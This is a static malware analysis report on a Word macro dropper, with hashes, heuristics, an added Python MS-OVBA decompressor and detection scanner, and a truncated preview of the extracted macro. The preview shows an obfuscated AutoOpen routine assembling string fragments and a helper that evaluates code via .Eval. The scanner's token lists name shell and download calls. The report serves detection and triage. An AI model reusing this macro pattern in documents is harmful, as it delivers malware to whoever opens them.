Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 877c17645821e1b5…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 89.0 KB
Created: 2016-09-05 22:43:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31

MD5: 4ccbcc1bd7acd38385ac014786fe6837
SHA-1: 0e6fb6cf8dabdf7b55768a02ec44eaa2c834f907
SHA-256: 877c17645821e1b51f8ed28ce15d88deaa4a32c2c3e7ec4476253318ebd66b80

Risk score: 224

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Word (OLE) document whose VBA project defines an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. The extracted source shows a helper routine (ejehormybf2) that calls .Eval on whatever object is passed to it, and a CreateObject call was detected; together with the dozens of short string fragments assigned inside AutoOpen (see the preview below), this is the pattern of a macro that instantiates a COM object at runtime and evaluates code assembled from fragments, which is how a downloader stages and runs a second-stage payload. No download URL or payload is recoverable from the truncated preview, so the dropper classification rests on this behaviour and on the ClamAV signature Doc.Dropper.Agent-6460039-0.

Heuristics (8)

  • [critical] CLAMAV_DETECTION: ClamAV: Doc.Dropper.Agent-6460039-0
    ClamAV detected this file as malware: Doc.Dropper.Agent-6460039-0
  • [medium] OLE_VBA_MACROS: VBA macros detected (3 related findings)
    Document contains VBA macro code
  • [high] OLE_VBA_AUTOOPEN: AutoOpen macro
    The VBA project defines Sub AutoOpen, which Word runs automatically when the document is opened with macros enabled.
  • [high] OLE_VBA_CREATEOBJ: CreateObject call
    The macro calls CreateObject, which instantiates any COM object by ProgID (shell, scripting engine, HTTP client, file system) and is the usual way a macro reaches outside the document.
  • [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Caveat: the "no modern VBA project was recovered" premise does not hold for this sample, since olevba extracted a complete VBA module (macros.bas, listed under Extracted artifacts); treat this finding as redundant with the VBA findings rather than as independent evidence.
  • [info] EXTRACTED_FILE_STATIC_TRIAGE: Suspicious extracted artifact
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • [info] EMBEDDED_URL: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard DrawingML XML namespace URI present in any Office document with drawing content, not an attacker-controlled address; do not treat it as a network indicator.
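olevba recovered macros.bas by decompressing the source stored in the module stream (MS-OVBA compression); the p-code heuristic above exists for the case where that recovery fails. The following Python example is added here and is not the report's tooling: it implements the MS-OVBA decompression and, when the container is unreadable, falls back to a byte-level scan for the same auto-exec and execution tokens. The containers it decompresses are constructed by hand for this example, and the two token lists are an assumption about what such a heuristic keys on.

```python
"""MS-OVBA (section 2.4.1) decompression of a VBA module source stream plus a
raw-bytes fallback scan. Added example, not the report's tooling; the sample
containers below are constructed, not taken from the analysed document."""
import re

# Assumed token lists: auto-execution entry points and execution/download identifiers.
AUTOEXEC_RE = re.compile(rb"\b(AutoOpen|AutoExec|AutoClose|Document_Open|Workbook_Open)\b", re.I)
EXEC_RE = re.compile(rb"\b(CreateObject|GetObject|Shell|Eval|WScript|XMLHTTP|URLDownloadToFile|PowerShell)\b", re.I)


def decompress_vba(data: bytes) -> bytes:
    """Container = 0x01 signature, then chunks of [2-byte header][token sequences].
    Header: bits 0-11 = chunk size - 3, bits 12-14 = 0b011, bit 15 = compressed.
    In a compressed chunk each flag byte announces eight tokens: bit 0 = literal
    byte, bit 1 = two-byte LE copy token whose offset/length split depends on
    how far into the chunk the output currently is."""
    if not data or data[0] != 0x01:
        raise ValueError("not a compressed VBA container")
    out = bytearray()
    pos = 1
    while pos + 2 <= len(data):
        header = int.from_bytes(data[pos:pos + 2], "little")
        if ((header >> 12) & 0x7) != 0b011:
            raise ValueError("bad chunk signature at offset %d" % pos)
        chunk_end = pos + (header & 0x0FFF) + 3
        chunk_start = len(out)
        pos += 2
        if not (header & 0x8000):            # uncompressed chunk: 4096 raw bytes
            out += data[pos:pos + 4096]
        else:
            while pos < chunk_end:
                flags = data[pos]
                pos += 1
                for bit in range(8):
                    if pos >= chunk_end:
                        break
                    if not (flags >> bit) & 1:
                        out.append(data[pos])
                        pos += 1
                        continue
                    token = int.from_bytes(data[pos:pos + 2], "little")
                    pos += 2
                    difference = len(out) - chunk_start
                    bit_count = max((difference - 1).bit_length(), 4)  # ceil(log2(difference)), min 4
                    length = (token & (0xFFFF >> bit_count)) + 3
                    offset = (token >> (16 - bit_count)) + 1
                    src = len(out) - offset
                    for i in range(length):          # byte-wise so overlapping copies work
                        out.append(out[src + i])
        pos = chunk_end
    return bytes(out)


def compress_literals(src: bytes) -> bytes:
    """Minimal MS-OVBA encoder: one compressed chunk of literal tokens only
    (valid per the spec, just not compact). Used to build test input here."""
    if len(src) > 3584:                      # 3584 literals + 448 flag bytes fit one chunk
        raise ValueError("single-chunk literal encoder limited to 3584 bytes")
    body = bytearray()
    for i in range(0, len(src), 8):
        body.append(0x00)                    # flag byte: all eight tokens are literals
        body += src[i:i + 8]
    header = 0x8000 | 0x3000 | (len(body) + 2 - 3)
    return b"\x01" + header.to_bytes(2, "little") + bytes(body)


# Hand-built chunk that exercises the copy-token path: "AutoOpen" as eight
# literals, then " " and a copy token (offset 9, length 8) -> "AutoOpen AutoOpen".
COPY_TOKEN_CONTAINER = b"\x01\x0c\xb0" + b"\x00" + b"AutoOpen" + b"\x02" + b" " + b"\x05\x80"

# Constructed module source in the shape of the extracted macro (not the sample's code).
SAMPLE_SRC = (b'Attribute VB_Name = "ThisDocument"\r\n'
              b'Sub AutoOpen()\r\n'
              b'    Set o = CreateObject(progid)\r\n'
              b'    o.Eval payload\r\n'
              b'End Sub\r\n')


def triage_module_stream(raw: bytes) -> dict:
    """Decompress if possible; otherwise scan the raw bytes for the same tokens,
    which is what the p-code heuristic does when no source is available."""
    try:
        text, recovered = decompress_vba(raw), True
    except ValueError:
        text, recovered = raw, False
    autoexec = sorted({m.decode() for m in AUTOEXEC_RE.findall(text)})
    execs = sorted({m.decode() for m in EXEC_RE.findall(text)})
    return {"source_recovered": recovered, "autoexec": autoexec, "exec": execs,
            "flag": bool(autoexec and execs)}


if __name__ == "__main__":
    print(triage_module_stream(compress_literals(SAMPLE_SRC)))
    print(decompress_vba(COPY_TOKEN_CONTAINER))
```

A hit from the raw-bytes fallback is weaker evidence than one from recovered source, because it cannot tell a call from an identifier that merely appears in the stream; the report treats it the same way, as a token co-occurrence rather than a confirmed behaviour.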

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 15564 bytes
SHA-256: 40223438d8e177802e1e47d5afd66d47ba66ce06ad8dc2c798e6dc75a792a93d
Detection: ClamAV: No threats found
Obfuscation or payload: likely. The carved artifact contains 1 eval/decoder/string-building token (most likely the .Eval call in ejehormybf2 visible in the preview).

Preview script (first 1,000 lines of the extracted source):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ejehormybf2(ntujen0, ilushes)
ntujen0.Eval (ilushes)
End Sub
        
Sub AutoOpen()
Dim vmineqeqc
Dim ebyba, echohxopo, xnelabf6, aqanbygezw, urdypzigtucp8, omjepra, yjebxapbecq, hugepej, owarfupo3, cxonynwive, ohguvqi, xhehcaly, usmejbakh5, ybxovoxa, ywirykhiv2
Dim rapvostu, fzerfyva, bipefzeda, hcejdirc0, sdotkihtil8, isylliru2, arnoso, owajhe, ypaki1, cboksacetr
Dim olbybhe, fnarujmu1, uqefze1, wqosols, izbazejidd9, bogabaz0, skytjec, zecmadpedty, yclapwy0, gyzujritn8, idyduncu, angilvovas4, otebo, fqosfethy2
'hereafter beadle pulps scouts unbending
Dim kaliny2
Dim urysaz4, evecoc6, ydxiphulza, xyjoszyv4, ajtitydo9, domhotac9, hjixxut4, ydsolhod, avadleh, ozkinydme, basugybu2, uddasy0, qhucfykd
Dim etvofi
Dim nhyjzelz, jokmulpyky5, ulfekhyk9, vudfow, joqugoqji, zkybow9, ewfuduwb, fpyrveh6, ybdehgehi, pkapmispo1, moromcaqo3, ycmomren, ysgequ0
Dim iruhjuzlih
Dim wolalhoju5
Dim klufvoljady, ikqowmoqb9, nrodmynh1, ecykki, wwegeq, ekorwipoql, ujbaji6, adizkojoqh, oqozlopv4, ijdame, ajwahozq5, bderotkucx, gwomcilnyj5, vtirujosxe, psikulvo1, hoqpovkope
Dim alydigzimm7, icjekme5, yhqyndipo, fqyzenvycy, okefadafw, qidypub, yjkaxyzr7, lmentykhojy3, binsah, bepibe4, vcyjackohu, marolyhe6, ogiswa1, ygugnofbyh5, ubyjygvuhp, ahquqdesj, guqpuw1
'rumpus hacks loved archetypical tenderest recidivism
Dim hezwytijw
Dim avzazvowy0, ahwugyfd0, essydwudni2, fondacn, qivzyrra9, xgadirkept0, ssyhyjsonz4, ycyqyhg, ydgepe8, mzexag, pkimmica0, zhizhogjeq, jwyzhygasko, irascaru, gmofdicwitzo6
Dim hlebraq
Dim ymales
Dim izferugonf
Dim pdihbatera, vagfojpati, nypkexab3, rjihepgygf0, pirezl, izlajomdewj, etquqacsunh8, sbybumilv4, ifakno, opkytyra, tavzol1, nxylxorsod
Dim iqkufygpip
'dispiriting warmup descriptivism prudery plankton
Dim xilgucy9
Dim rupyvw
Dim hexmyrod9, ezecpy, uzytdi0, embilo, ncewacymh, axnyfody, hediznamla3, bsegbodnes, pmimdahyxga8, qkorxovju, dgucug1, ysbopahre1, usfara5, azhoqursi0
Dim neqzufy9, famaplazx, ohagdupguc6, ckosawquxo, tuvjamykse, ylcaqondu3, uxyxsibgu8, busbivvyxo, awaxiwe, yzjesyzaqt, eqxucxew, ydxingyfri, mnuknylpis
Dim unrytvy
Dim sdynykq0
'scatters inconsolable teed flask drums
Dim iwovkochuf9
Dim eshidfojne4
Dim ozvihqescu9
Dim zuretqex8
Dim zkymabb, eludiw4, ecmygyqydm, yfovy7, ivojtytje, axymdarri, gfilquxyp3, khyvyrlu3, bednorip, rxadaz3, maziz8, grufhepog, risfude0
Dim bdiqpemok0
Dim vudar6
'inhumanity ancestral car stakes formant accompanying gentility
Dim uqwedikjacj, kugik, ihkikfiq, oqahawwy7, ftyjypca, ogcycab8, padfanu6, wajywciti6, wejuwyj, nidxetp4, lutwulw2, ehyqo, otijvysda8, ivake, qtitomt
Dim ytwocedteh5, eqhubijc, qaxpyva, unsesutda, emcalkuqoct0, obezyroc6, uwamyncus0, lfezwuqula2, etoztucqa7, rezine, idpopcafdy8, usrymylcuj, esuxrewydl1
Dim alonryxyjv
Dim tekmuryx, dbasubpepo0, lgafpislokc, vonoksomqy3, fohmeckyvx6, magrem0, ynenban0, atekzi, cybushub6, dufizy4, ywpobgubd, ahyquqh7, jakezz0, hebowx5
Dim uzlukbuprix
Dim cachenrahbu
'unscrambles containing befit smirks variety plastics timekeeper
Dim subylle, mofpemta2, ulyxrusin1, svykyhewe7, avymoni0, fxyvmap, ydqijy, iguvuf0, itgyzihixl, iwtobjunu4
Dim ihirimbi0, eriflamk, alzesjady, txosolbo7, idometd, icpupoj9, gejvomj2, lepuwh0, ikfijerik1, usdumonb, ipxyfo, xivybn, yqtyhy0, gdukojyvy1, cimsutaso7, wabofji
Dim ohmahawbexh, onasolkacm6, gojdilh, duxomas, ukgyjgoh, vavemdo, ebmijk3, gimdofse, papi2, janpesvo, rajuronr
Dim azulyvk
Dim ihetag, ivxiwpotgy5, ypezu, vraheku9, jicu, depgymif, ovixame3, wdusebj3, belfanky
Dim elynjebtu5, rynzazd2, drafak, oncogkyvd9, nlahpyra7
'abhorrence blindfolded descenders rectifier heterosexuals physiotherapist endorses pessimistically slimness
ukgyjgoh = "ew"
owarfupo3 = "bj"
cybushub6 = " +"
nidxetp4 = "el"
yqtyhy0 = "va"
atekzi = "Ge"
'ineradicably vernacul
... (truncated)